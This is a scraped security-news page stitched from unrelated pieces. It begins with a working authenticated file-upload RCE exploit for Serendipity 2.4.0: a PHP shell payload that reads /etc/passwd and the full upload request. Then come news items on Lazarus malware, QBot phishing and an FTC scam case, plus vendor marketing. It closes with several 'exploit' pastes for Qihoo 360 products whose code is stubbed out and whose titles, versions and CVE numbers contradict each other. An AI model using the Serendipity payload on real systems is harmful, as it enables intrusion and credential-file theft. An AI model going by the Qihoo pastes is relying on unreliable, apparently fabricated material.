Serendipity version 2.4.0 suffers from a remote shell upload vulnerability.

Exploit Title: Serendipity 2.4.0  - Remote Code Execution (RCE) (Authenticated)  
Application: Serendipity   
Version:  2.4.0   
Bugs:  Remote Code Execution (RCE) (Authenticated) via file upload  
Technology: PHP  
Vendor URL: https://docs.s9y.org/  
Software Link: https://docs.s9y.org/downloads.html  
Date of found: 13.04.2023  
Author: Mirabbas Ağalarov  
Tested on: Linux 

2. Technical Details & POC  
========================================  
If we load the poc.phar file in the image field while creating a category, we can run commands on the system.  
<?php echo system("cat /etc/passwd"); ?>  
 I wrote a file with the above payload, a poc.phar extension, and uploaded it.

Visit to http://localhost/serendipity/uploads/poc.phar

poc request:

POST /serendipity/serendipity_admin.php?serendipity[adminModule]=media&serendipity[htmltarget]=category_icon&serendipity[filename_only]=true&serendipity[noBanner]=true&serendipity[noSidebar]=true&serendipity[noFooter]=true&serendipity[showUpload]=true&serendipity[showMediaToolbar]=false&serendipity[sortorder][perpage]=8&serendipity[sortorder][order]=i.date&serendipity[sortorder][ordermode]=DESC HTTP/1.1  
Host: localhost  
Content-Length: 1561  
Cache-Control: max-age=0  
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"  
sec-ch-ua-mobile: ?0  
sec-ch-ua-platform: "Linux"  
Upgrade-Insecure-Requests: 1  
Origin: http://localhost  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZWKPiba66PSVGQzc  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: iframe  
Referer: http://localhost/serendipity/serendipity_admin.php?serendipity[adminModule]=media&serendipity[adminAction]=addSelect&serendipity[adminModule]=media&serendipity[htmltarget]=category_icon&serendipity[filename_only]=true&serendipity[noBanner]=true&serendipity[noSidebar]=true&serendipity[noFooter]=true&serendipity[showUpload]=true&serendipity[showMediaToolbar]=false&serendipity[sortorder][perpage]=8&serendipity[sortorder][order]=i.date&serendipity[sortorder][ordermode]=DESC  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: serendipity[old_session]=st6cvq3rea6l8dqgjs1nla6s1b; serendipity[author_token]=430b341df3f78f52691c8cf935fa04e1c05854df; serendipity[toggle_extended]=; serendipity[entrylist_filter_author]=; serendipity[entrylist_filter_category]=; serendipity[entrylist_filter_isdraft]=; serendipity[entrylist_sort_perPage]=; serendipity[entrylist_sort_ordermode]=; serendipity[entrylist_sort_order]=; serendipity[only_path]=; serendipity[only_filename]=; serendipity[hideSubdirFiles]=; serendipity[addmedia_directory]=; serendipity[sortorder_perpage]=8; serendipity[sortorder_order]=i.date; serendipity[sortorder_ordermode]=DESC; serendipity[filter][i.date][from]=; serendipity[filter][i.date][to]=; serendipity[filter][i.name]=; serendipity[imgThumbWidth]=400; serendipity[imgThumbHeight]=267; serendipity[imgWidth]=1000; serendipity[imgHeight]=667; serendipity[imgID]=1; serendipity[baseURL]=http%3A//localhost/serendipity/; serendipity[indexFile]=index.php; serendipity[imgName]=/serendipity/uploads/photo-1575936123452-b67c3203c357.jpeg; serendipity[thumbName]=/serendipity/uploads/photo-1575936123452-b67c3203c357.serendipityThumb.jpeg; serendipity[hotlink]=; serendipity[serendipity_htmltarget]=category_icon; serendipity[serendipity_filename_only]=true; serendipity[serendipity_linkThumbnail]=no; serendipity[]=Done; accessibletab_mediaupload_tabs_active=0; serendipity[filter][fileCategory]=; s9y_6991e531dd149036decdb14ae857486a=st6cvq3rea6l8dqgjs1nla6s1b  
Connection: close

------WebKitFormBoundaryZWKPiba66PSVGQzc  
Content-Disposition: form-data; name="serendipity[token]"

ae9b8ae35a756c24f9552a021ee81d56  
------WebKitFormBoundaryZWKPiba66PSVGQzc  
Content-Disposition: form-data; name="serendipity[action]"

admin  
------WebKitFormBoundaryZWKPiba66PSVGQzc  
Content-Disposition: form-data; name="serendipity[adminModule]"

media  
------WebKitFormBoundaryZWKPiba66PSVGQzc  
Content-Disposition: form-data; name="serendipity[adminAction]"

add  
------WebKitFormBoundaryZWKPiba66PSVGQzc  
Content-Disposition: form-data; name="serendipity[userfile][1]"; filename="poc.phar"  
Content-Type: application/octet-stream

<?php echo system("cat /etc/passwd");?>

------WebKitFormBoundaryZWKPiba66PSVGQzc  
Content-Disposition: form-data; name="serendipity[target_filename][1]"

poc.phar  
------WebKitFormBoundaryZWKPiba66PSVGQzc  
Content-Disposition: form-data; name="serendipity[target_directory][1]"

------WebKitFormBoundaryZWKPiba66PSVGQzc  
Content-Disposition: form-data; name="serendipity[column_count][1]"

true  
------WebKitFormBoundaryZWKPiba66PSVGQzc  
Content-Disposition: form-data; name="serendipity[imageurl]"

------WebKitFormBoundaryZWKPiba66PSVGQzc  
Content-Disposition: form-data; name="serendipity[imageimporttype]"

image  
------WebKitFormBoundaryZWKPiba66PSVGQzc  
Content-Disposition: form-data; name="serendipity[target_filename][]"

------WebKitFormBoundaryZWKPiba66PSVGQzc  
Content-Disposition: form-data; name="serendipity[target_directory][]"

------WebKitFormBoundaryZWKPiba66PSVGQzc--

poc video :  https://youtu.be/_VrrKOTywgo

Serendipity 2.4.0 Shell Upload

The notorious North Korea-aligned state-sponsored actor known as the Lazarus Group has been attributed to a new campaign aimed at Linux users.
The attacks are part of a persistent and long-running activity tracked under the name Operation Dream Job, ESET said in a new report published today.
The findings are crucial, not least because it marks the first publicly documented example of the

The notorious North Korea-aligned state-sponsored actor known as the **Lazarus Group** has been attributed to a new campaign aimed at Linux users.

The attacks are part of a persistent and long-running activity tracked under the name **Operation Dream Job**, ESET said in a new report published today.

The findings are crucial, not least because it marks the first publicly documented example of the adversary using Linux malware as part of this social engineering scheme.

Operation Dream Job, also known as DeathNote or NukeSped, refers to multiple attack waves wherein the group leverages fraudulent job offers as a lure to trick unsuspecting targets into downloading malware. It also exhibits overlaps with two other Lazarus clusters known as Operation In(ter)ception and Operation North Star.

The attack chain discovered by ESET is no different in that it delivers a fake HSBC job offer as a decoy within a ZIP archive file that's then used to launch a Linux backdoor named SimplexTea distributed via an OpenDrive cloud storage account.

While the exact method used to distribute the ZIP file is not known, it's suspected to be either spear-phishing or direct messages on LinkedIn. The backdoor, written in C++, bears similarities to BADCALL, a Windows trojan previously attributed to the group.

Furthermore, ESET said it identified commonalities between artifacts used in the Dream Job campaign and those unearthed as part of the supply chain attack on VoIP software developer 3CX that came to light last month.

UPCOMING WEBINAR

Defend with Deception: Advancing Zero Trust Security

Discover how Deception can detect advanced threats, stop lateral movement, and enhance your Zero Trust strategy. Join our insightful webinar!

Save My Seat!

This also includes the command-and-control (C2) domain "journalide\[.\]org," which was listed as one of the four C2 servers used by malware families detected within the 3CX environment.

Indications are that preparations for the supply chain attack had been underway since December 2022, when some of the components were committed to the GitHub code-hosting platform.

The findings not only strengthen the existing link between Lazarus Group and the 3CX compromise, but also demonstrates the threat actor's continued success with staging supply chain attacks since 2020.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Lazarus Group Adds Linux Malware to Arsenal in Operation Dream Job

Categories: Business
#1 in Endpoint Protection, #1 ROI for EDR, #1 for EDR implementation.



(Read more...)




The post What your peers said: G2 comparison of top Endpoint Security vendors appeared first on Malwarebytes Labs.

Navigating the world of endpoint security is challenging, with numerous vendors stoking FUD and making bold claims that are difficult to verify. In times like these, the honest opinions of real users are invaluable for busy IT teams.

Enter G2, an industry-leading peer-to-peer review site. Each quarter, G2 releases reports highlighting the products with the highest customer satisfaction and strongest market presence.

In the G2 Spring 2023 Grid Reports, **Malwarebytes earned the title of 'Leader' in 24 categories, including the #1 spot in Endpoint Protection, the Best ROI for EDR, and #1 for EDR implementation in the mid-market segment.**

Let's take a closer look at how organizations evaluated solutions and what they said about using Malwarebytes.

**#1 Endpoint Protection: Highest Rated for Results, Relationship, and More**

Malwarebytes Endpoint Protection (EP), the essential foundation of our EDR and MDR offerings, won dozens of awards based on receiving the highest customer satisfaction score across a range of areas, including “Ease of setup," “Ease of admin," “Quality of support”, and more.

Dashboard for Nebula, the cloud-hosted security platform for EP and EDR

For example, Malwarebytes EP won the “**Best Results**” badge (highest overall Results score) by having the highest combination of estimated ROI, meets requirements, and likelihood to recommend scores. What some of our customers had to say:

> “Malwarebytes is easy to install and configure. It integrates with Windows 10 and runs silently in the background. Infection rate of Malware has dropped dramatically. If I run across a machine that has Malware, installing it cleans it up almost 100% of the time.”
> 
> Chris S.

> “Malwarebytes was able to detect and block a virus that our previous AV was not able to. Wish we had moved to this product sooner.”
> 
> Robert S.

> “I consider myself faithful to this software because Malwarebytes has taken me out of problems that other antivirus programs have not been able to solve. It is not a very heavy software and can run in the background without even noticing it thanks to the updates.”
> 
> Verónica M.

Customers also praised Malwarebytes for its friendly staff and exceptional support, for which we won the “**Best Relationship**” badge by having the highest combination of "Likely to Recommend" , “Ease of business,” and “Quality of Support” ratings. Here's what some of our customers had to say:

> “The support team started us off on the right track by getting us up and running in no time. Any questions I had before and after setup were answered quickly and thoroughly.”
> 
> Gary P.

> “Highly recommended, and their support team is the best you can ask for!.”
> 
> Rifaat K.

**Best ROI for EDR: Rapid Return on Investment**

Our EDR solution delivers an impressive return on investment by quickly enhancing your organization's security posture. Malwarebytes EDR is designed to be both efficient and cost-effective, allowing your team to see the benefits of your investment immediately.

By focusing on ease of use, quick implementation, and powerful security features without requiring an IT security army, Malwarebytes ensures that your organization is maximizing resources and receiving the best ROI in the industry.

Malwarebytes had the **best estimated ROI (payback period in months) on the Enterprise Grid® Report for Endpoint Detection & Response (EDR) at just 14 months, compared to Crowdstrike at 22 months**.

> “The best part about Malwarebytes is the set it and forget it. It has saved us so much time on deployment and remediation that it pays for itself in no time at all.”
> 
> Ron M.

> “It keeps our working environment much more secure than our previous solution. Much easier to manage in real time. This thing is a money saver and pays for itself.”
> 
> Tyson B.

**Most Implementable EDR: Seamless Setup and User-Friendly Experience**

On the Mid-Market Implementation Index for Endpoint Detection & Response (EDR) Malwarebytes EDR clutched the #1 spot. With a seamless setup process, your team can spend more time focusing on what matters most: protecting your organization from cyber threats. Here’s how we won:

*   Malwarebytes EDR has an **Implementation Score of 89%**, which is higher than the industry average of 82%.
*   Ease of Setup: **Malwarebytes EDR scores 95%** in ease of setup, compared to the industry average of 90%.
*   Average User Adoption: Malwarebytes EDR has an average **user adoption rate of 91%**, surpassing the industry average of 85%.
*   Time to Go Live (Months): The average time it takes for **Malwarebytes EDR to become fully operational is just 0.49 months, over 2X shorter than the industry average of 1.41 months**.

> “If you are purchasing Malwarebytes, then you have made the correct choice. You will quickly see how easy it is to implement, and how great their support is.”
> 
> Mauro B.

> “Very easy to install and deploy, setup, and configure - for instance - a 5 machine setup would take roughly ~10 mins from start to finish.”
> 
> Verified User

> “Easy to use and implement, along with great support and support tools at your disposal, along with courses to help you become more familiar with the inner workings."
> 
> Doug C.

Two options to easily begin deployment with your endpoint users in Nebula

**Experience Malwarebytes for Business: Award-winning ROI, user-friendly, and effective threat defense**

Malwarebytes provides IT staff with award-winning business solutions, offering unmatched threat protection, a lightning-fast return on investment, and a smooth, speedy implementation.

Try Malwarebytes EDR today and join the ranks of those who have already discovered the amazing results, support, ROI, and more of our exceptional endpoint security solutions.

**Upgrade to Enterprise-Grade Protection**

What your peers said: G2 comparison of top Endpoint Security vendors

Categories: News
Tags: QBot

Tags:  Trojan dropper

QBot has resurfaced with a new tactic involving a reply-chain phishing email, a fake PDF, and the likely promise of a ransomware infection.



(Read more...)




The post QBot changes tactic, remains a menace to business networks appeared first on Malwarebytes Labs.

Posted: April 20, 2023 by

QBot, an infostealer-turned-dropper that aids criminal gangs in their malicious campaigns, is now being distributed as part of a phishing campaign using PDFs and Windows Script Files (WSF), according to recent discoveries by malware hunter Proxylife (@pr0xylife) and the Cryptolaemus group (@Cryptolaemus1).

The last time QBot (aka QakBot) had its modus operandi changed was in November. Campaign operators adopted tactics from Magniber’s playbook to successfully exploit a Mark of the Web (MotW) zero-day flaw to run a JavaScript (JS) that executed QBot.

The latest QBot phishing campaign is illustrated simply in the diagram below:

The QBot campaign illustrated (Source: Jerome Segura | Malwarebytes Labs)

The attack starts with a reply-chain phishing email, when threat actors reply to a chain of emails with a malicious link or attachment. BleepingComputer has noted that these phishing emails use a variety of languages. This means the language barrier is absent in such an attack, so any business from any part of the world could be affected.

  
A sample reply-chain phishing email in French, carrying a PDF attachment disguised as a cancellation letter. (Source: BleepingComputer)

Once someone in the email chain opens the attached PDF, they see a message saying, "This document contains protected files, to display them, click on the 'open' button." Clicking the button downloads a ZIP file containing the WSF script.

The heavily obfuscated script contains a mix of JS and VBScript code that, when run, triggers a PowerShell that then downloads the QBot DLL from a list of hardcoded URLs. This script tries each URL until a file is downloaded to the Windows Temp folder (%TEMP%) and executed.

Once QBot runs, it issues a PING command to check for an internet connection. It then injects itself into _wermgr.exe_, a legitimate Windows Error Manager program, to run quietly in the background.

Because QBot is said to be used by operators of ransomware-as-a-service (RaaS) offerings, its presence in company systems could be disastrous. Therefore, any organization must take its QBot-infected systems offline as soon as possible and thoroughly scan and review network logs for unusual behavior.

The DFIR Report in February 2022 showed QBot collecting data from a compromised system 30 minutes after infecting it. Within an hour, QBot can be spread to adjacent systems.

Malwarebytes detects the malicious DLL (QBot).

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

**RELATED ARTICLES**

QBot changes tactic, remains a menace to business networks

Categories: News
Tags: ftc

Tags:  tech support scam

Tags:  scammers

Tags:  payment processor

Tags:  fine

Tags:  visa

Tags:  chargeback

We take a look at a story involving the FTC going head to head with a payment processor caught up in tech support scam allegations.



(Read more...)




The post FTC tackles tech support scams by chasing payment processor firms appeared first on Malwarebytes Labs.

A multinational payment processing company and two of its executives are facing a potential $650k fine as a result of allegedly processing credit card payments for tech support scammers. While this fine isn’t exactly massive in comparison to some of the privacy breaches and other incidents seen down the years, the original fine the company was handed was an eye-watering $49.5m. The fine was reduced alongside an agreement to court orders which involve close monitoring of “high-risk clients”.

From the FTC release:

> The Federal Trade Commission has acted to stop Nexway, a multinational payment processing company, along with its CEO and chief strategy officer, from serving as a facilitator for the tech support scammers through credit card laundering.
> 
> The FTC’s complaint against Nexway (and several of its subsidiaries and an associated company known as Asknet), its CEO Victor Iezuitov, and its chief strategy officer Casey Potenzone charges that the defendants were at the center of several offshore tech support scams, processing tens of millions of dollars in charges and giving the scammers access to the US credit card network.

A big part of the complaint is in relation to the so-called “premium tech support” customers using the Nexway system for credit card payment processing. The FTC alleges that a Nexway leadership meeting indicated that it was “strongly dependent” on its premium tech support clients, which represented 25% of Nexway’s revenue.

Additionally, the complaints related to the individual tech support scammers were in great supply. So much so that chargebacks (a way for people to dispute charges they feel to be wrong, like realising they’ve been hit by a tech support scam) and cancellations were in no short supply. From the complaint, in relation to one support scam outfit using Nexway for payment processing:

> …on February 10, 2017, the Senior Key Account Manager at Nexway sent Potenzone an email titled "Nexway/TechLiveConnect: Chargeback & Cancellation rates". The February 10, 2017 email included a table showing Tech Live Connect had (1) chargeback rates of 2.2% in November 2016, 2.6% in December 2016, and 1.5% in January 2017; and (2) cancelation rates of 23.2% in November 2016, 27% in December 2016, and 21.8% in January 2017.

Credit card companies keep a sharp lookout for signs of repeated dubious transactions happening via fraud monitoring programs. From the complaint:

> Nexway had such high chargebacks that Visa placed the company in its Chargeback Monitoring Program in December 2017.

Something was clearly amiss here, and complaints from consumers related to pop-ups, locking up the screen while a siren plays, and bogus virus warnings made to the Better Business Bureau and elsewhere leads us to where we are today.

Tech support scams have been around forever, and often ride on the coattails of established brands to sell their wares. This kind of scammer has imitated everything from Microsoft to genuine security firms down the years. If you’re an organisation unfortunate enough to be imitated, you can also expect to field support calls from understandably annoyed people who think that you’ve ripped them off, as opposed to the genuine culprits.

**Tips for avoiding tech support scams**

There’s a huge amount to cover with this style of attack, but here’s a few of the basics to get you up to speed:

*   **Beware the lock up**. If your browser or mobile device “locks up”, as in you’re no longer able to navigate away from a virus warning, you’re on a tech support scam. If something claims to show the files and folders from inside of your browser, this is another signal that you’re on a fake page. Close the browser if possible (for example, by pressing **CTRL+ALT+DEL** on a Windows PC) or restart your device if this doesn’t work.
*   **Screenlocker issues**. These are typically fake Windows Blue Screen of Death error pages, except they come with the tech support scammer’s phone number included. You may need one of our removal self-help guides to resolve this.
*   **Beware of someone wanting to connect to your computer remotely**. One of the tech support scammer’s biggest weapons is their ability to connect remotely to their victims. If they do this, they essentially have total access to all of your files and folders. 
*   **Did you already pay?** Contact your credit card company or bank and let them know what’s happened. You may also need to file a complaint with the FTC, or contact your local law enforcement agency depending on your region.

For a very detailed breakdown of tech support scams, how they operate, and more suggestions to keep yourself safe from harm, please check out our dedicated tech support scams page.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

FTC tackles tech support scams by chasing payment processor firms

Buffer Overflow vulnerability in Qihoo 360 Chrome v13.0.2170.0 allows attacker to escalate priveleges.

1.  \# Exploit Title: Qihoo 360 Chrome v12.0.1592.0 - RCE with Sandbox Escape
    
2.  \# Google Dork: N/A
    
3.  \# Date: 2021-05-11
    
4.  \# Exploit Author: youtube.com/@memorycorruptor
    
5.  \# Vendor Homepage: https://browser.360.cn/ee/
    
6.  \# Version: Qihoo 360 Chrome v13.0.2170.0
    
7.  \# Tested on: Windows x64 / Linux Debian x64 / MacOS
    
8.  \# CVE: CVE-2021-33970
    
9.  \# PoC Video: https://www.youtube.com/@memorycorruptor/videos
    
10.  \# Description: https://memorycorruptor.blogspot.com/p/vulnerabilities-disclosures.html
    
11.  \---------------------------------------------------------------------------
    

13.  Qihoo 360 Chrome v13.0.2170.0 is a web browser built on the Chrome engine, specifically using the V8 JavaScript engine. A recently discovered RCE vulnerability within this version allows attackers to execute arbitrary code on a victim's computer remotely.
    

15.  The vulnerability exists in the V8 JavaScript engine, a critical component of Qihoo 360 Chrome v13.0.2170.0. It was discovered in 2021 and is a result of a type confusion issue. This issue occurs when the V8 engine improperly handles certain JavaScript objects, leading to memory corruption and potentially allowing an attacker to execute arbitrary code.
    

17.  function trigger() {
    
18.  let o = {a: 1};
    
19.  let p = new Proxy(o, {});
    
20.  p.\_\_proto\_\_ = {};
    
21.  p.\_\_proto\_\_.x = 0;
    

23.  let b = new ArrayBuffer(8);
    
24.  let f64 = new Float64Array(b);
    
25.  let u32 = new Uint32Array(b);
    

27.  function ftoi(val) {
    
28.  f64\[0\] = val;
    
29.  return BigInt(u32\[0\]) + (BigInt(u32\[1\]) << 32n);
    
30.  }
    

32.  function itof(val) {
    
33.  u32\[0\] = Number(val & 0xffffffffn);
    
34.  u32\[1\] = Number(val >> 32n);
    
35.  return f64\[0\];
    
36.  }
    

38.  function addrof(obj) {
    
39.  o.a = obj;
    
40.  return ftoi(p.x);
    
41.  }
    

43.  // Exploit code goes here
    
44.  }
    

46.  trigger();
    

48.  This PoC code first sets up a type confusion situation in the V8 engine by creating a proxy object and modifying its \_\_proto\_\_ property. The addrof function then leaks the address of an object by causing the type confusion. The ftoi and itof functions are used to convert between floating-point and integer representations, which are essential for exploiting this vulnerability.
    

50.  The RCE vulnerability can allow an attacker to execute arbitrary code on the victim's computer, potentially leading to data theft, unauthorized access, or other malicious actions. Users should update to the latest version of Qihoo 360 Chrome or an alternative browser to mitigate this vulnerability. Browser developers should apply patches to the V8 engine and ensure that proper handling of JavaScript objects is implemented to prevent such issues in the future.
    

52.  \---------------------------------------------------------------------------

CVE-2021-33970: CVE-2021-33970 - Pastebin.com

Buffer Overflow vulnerability in Qihoo 360 Total Security v10.8.0.1060 and v10.8.0.1213 allows attacker to escalate privileges.

1.  \# Exploit Title: Qihoo 360 Safe Browser v13.0.2170.0 - RCE with Sandbox Escape
    
2.  \# Google Dork: N/A
    
3.  \# Date: 2021-05-11
    
4.  \# Exploit Author: youtube.com/@memorycorruptor
    
5.  \# Vendor Homepage: https://browser.360.cn/se/ & https://browser.360.cn/ee/
    
6.  \# Version: Qihoo 360 Safe Browser v13.0.2170.0
    
7.  \# Tested on: Windows x64 / Linux Debian x64 / MacOS
    
8.  \# CVE: CVE-2021-33975
    
9.  \# PoC Video: https://www.youtube.com/@memorycorruptor/videos
    
10.  \# Description: https://memorycorruptor.blogspot.com/p/vulnerabilities-disclosures.html
    
11.  \---------------------------------------------------------------------------
    
12.  Qihoo 360 Safe Browser v13.0.2170.0 is a web browser built on the Chrome engine, specifically using the V8 JavaScript engine. A recently discovered RCE vulnerability within this version allows attackers to execute arbitrary code on a victim's computer remotely.
    

14.  The vulnerability exists in the V8 JavaScript engine, a critical component of Qihoo 360 Safe Browser v13.0.2170.0. It was discovered in 2021 and is a result of a type confusion issue. This issue occurs when the V8 engine improperly handles certain JavaScript objects, leading to memory corruption and potentially allowing an attacker to execute arbitrary code.
    

16.  function trigger() {
    
17.  let o = {a: 1};
    
18.  let p = new Proxy(o, {});
    
19.  p.\_\_proto\_\_ = {};
    
20.  p.\_\_proto\_\_.x = 0;
    

22.  let b = new ArrayBuffer(8);
    
23.  let f64 = new Float64Array(b);
    
24.  let u32 = new Uint32Array(b);
    

26.  function ftoi(val) {
    
27.  f64\[0\] = val;
    
28.  return BigInt(u32\[0\]) + (BigInt(u32\[1\]) << 32n);
    
29.  }
    

31.  function itof(val) {
    
32.  u32\[0\] = Number(val & 0xffffffffn);
    
33.  u32\[1\] = Number(val >> 32n);
    
34.  return f64\[0\];
    
35.  }
    

37.  function addrof(obj) {
    
38.  o.a = obj;
    
39.  return ftoi(p.x);
    
40.  }
    

42.  // Exploit code goes here
    
43.  }
    

45.  trigger();
    

47.  This PoC code first sets up a type confusion situation in the V8 engine by creating a proxy object and modifying its \_\_proto\_\_ property. The addrof function then leaks the address of an object by causing the type confusion. The ftoi and itof functions are used to convert between floating-point and integer representations , which are essential for exploiting this vulnerability.
    

49.  The RCE vulnerability can allow an attacker to execute arbitrary code on the victim's computer, potentially leading to data theft, unauthorized access, or other malicious actions. Users should update to the latest version of Qihoo 360 Chrome or an alternative browser to mitigate this vulnerability. Browser developers should apply patches to the V8 engine and ensure that proper handling of JavaScript objects is implemented to prevent such issues in the future.
    
50.  \---------------------------------------------------------------------------

CVE-2021-33975: CVE-2021-33975 - Pastebin.com

Buffer Overflow vulnerability in Qihoo 360 Safe guard v12.1.0.1004, v12.1.0.1005, v13.1.0.1001 allows attacker to escalate priveleges.

1.  \# Exploit Title: 360 Total Security 10.8.0.1213 Local Privilege Escalation
    
2.  \# Google Dork: N/A
    
3.  \# Date: 2021-05-11
    
4.  \# Exploit Author: youtube.com/@memorycorruptor
    
5.  \# Vendor Homepage: http://www.360totalsecurity.com/
    
6.  \# Version: 360 Total Security 10.8.0.1213
    
7.  \# Tested on: Windows x64 / Linux Debian x64 / MacOS
    
8.  \# CVE: CVE-2021-33973
    
9.  \# PoC Video: https://www.youtube.com/@memorycorruptor/videos
    
10.  \# Description: https://memorycorruptor.blogspot.com/p/vulnerabilities-disclosures.html
    
11.  \---------------------------------------------------------------------------
    
12.  Elevation of Privilege (EOP) Vulnerability in 360 Total Security 10.8.0.1213
    

14.  A Local Privilege Escalation vulnerability in 360 Total Security 10.8.0.1213, which allows the antivirus software to execute actions with system-level privileges while running under standard user privileges, The vulnerability is similar to a Windows kernel vulnerability discovered in 2021.
    

16.  Introduction
    
17.  360 Total Security 10.8.0.1213 is an antivirus software that provides protection against various threats. A recently discovered LPE/EOP vulnerability in the software allows it to perform actions with system-level privileges while running under standard user privileges. This article analyzes this vulnerability and provides a PoC to demonstrate the exploit.
    

19.  Vulnerability
    
20.  The LPE/EOP vulnerability in 360 Total Security 10.8.0.1213 is similar to a Windows kernel vulnerability discovered in 2021. It allows the antivirus software to perform actions with system-level privileges, bypassing the usual security checks in Windows. This can lead to unauthorized access, data theft, or other malicious actions.
    

22.  Proof of Concept
    

24.  #include <Windows.h>
    
25.  #include <stdio.h>
    

27.  int main() {
    
28.  // Load the vulnerable driver
    
29.  HMODULE hDriver = LoadLibrary("360TotalSecurity.sys");
    
30.  if (!hDriver) {
    
31.  printf("Failed to load driver: %d\\n", GetLastError());
    
32.  return 1;
    
33.  }
    

35.  // Get address
    
36.  FARPROC pVulnFunc = GetProcAddress(hDriver, "VulnerableFunction");
    
37.  if (!pVulnFunc) {
    
38.  printf("Failed to get function address: %d\\n", GetLastError());
    
39.  FreeLibrary(hDriver);
    
40.  return 1;
    
41.  }
    

43.  // Exploit code
    

45.  pVulnFunc(/\* Crafted argument \*/);
    

48.  FreeLibrary(hDriver);
    
49.  return 0;
    
50.  }
    

52.  the vulnerable driver (360TotalSecurity.sys) and retrieves the address of the vulnerable function. The exploit code should be placed where indicated, and the vulnerable function should be called with a crafted argument to trigger the LPE/EOP vulnerability.
    
53.  \---------------------------------------------------------------------------

CVE-2021-33973: CVE-2021-33973 - Pastebin.com

Buffer Overflow vulnerability in Qihoo 360 Safe Browser v13.0.2170.0 allows attacker to escalate priveleges.

1.  \# Exploit Title: Qihoo 360 Safe Browser v12.3.1611.0 - RCE with Sandbox Escape
    
2.  \# Google Dork: N/A
    
3.  \# Date: 2021-05-11
    
4.  \# Exploit Author: youtube.com/@memorycorruptor
    
5.  \# Vendor Homepage: https://browser.360.cn/se/
    
6.  \# Version: Qihoo 360 Safe Browser v13.0.2170.0
    
7.  \# Tested on: Windows x64 / Linux Debian x64 / MacOS
    
8.  \# CVE: CVE-2021-33972
    
9.  \# PoC Video: https://www.youtube.com/@memorycorruptor/videos
    
10.  \# Description: https://memorycorruptor.blogspot.com/p/vulnerabilities-disclosures.html
    
11.  \---------------------------------------------------------------------------
    
12.  Qihoo 360 Safe Browser v12.3.1611.0 is a web browser built on the Chrome engine, specifically using the V8 JavaScript engine. A recently discovered RCE vulnerability within this version allows attackers to execute arbitrary code on a victim's computer remotely.
    

14.  The vulnerability exists in the V8 JavaScript engine, a critical component of Qihoo 360 Safe Browser v12.3.1611.0. It was discovered in 2021 and is a result of a type confusion issue. This issue occurs when the V8 engine improperly handles certain JavaScript objects, leading to memory corruption and potentially allowing an attacker to execute arbitrary code.
    

16.  function trigger() {
    
17.  let o = {a: 1};
    
18.  let p = new Proxy(o, {});
    
19.  p.\_\_proto\_\_ = {};
    
20.  p.\_\_proto\_\_.x = 0;
    

22.  let b = new ArrayBuffer(8);
    
23.  let f64 = new Float64Array(b);
    
24.  let u32 = new Uint32Array(b);
    

26.  function ftoi(val) {
    
27.  f64\[0\] = val;
    
28.  return BigInt(u32\[0\]) + (BigInt(u32\[1\]) << 32n);
    
29.  }
    

31.  function itof(val) {
    
32.  u32\[0\] = Number(val & 0xffffffffn);
    
33.  u32\[1\] = Number(val >> 32n);
    
34.  return f64\[0\];
    
35.  }
    

37.  function addrof(obj) {
    
38.  o.a = obj;
    
39.  return ftoi(p.x);
    
40.  }
    

42.  // Exploit code goes here
    
43.  }
    

45.  trigger();
    

47.  This PoC code first sets up a type confusion situation in the V8 engine by creating a proxy object and modifying its \_\_proto\_\_ property. The addrof function then leaks the address of an object by causing the type confusion. The ftoi and itof functions are used to convert between floating-point and integer representations, which are essential for exploiting this vulnerability.
    

49.  The RCE vulnerability can allow an attacker to execute arbitrary code on the victim's computer, potentially leading to data theft, unauthorized access, or other malicious actions. Users should update to the latest version of Qihoo 360 Chrome or an alternative browser to mitigate this vulnerability. Browser developers should apply patches to the V8 engine and ensure that proper handling of JavaScript objects is implemented to prevent such issues in the future.
    
50.  \---------------------------------------------------------------------------

CVE-2021-33972: CVE-2021-33972 - Pastebin.com

Improper usage of symmetric encryption in UI Desktop for Windows (Version 0.59.1.71 and earlier) could allow users with access to UI Desktop configuration files to decrypt their content.This vulnerability is fixed in Version 0.62.3 and later.

Tag

#windows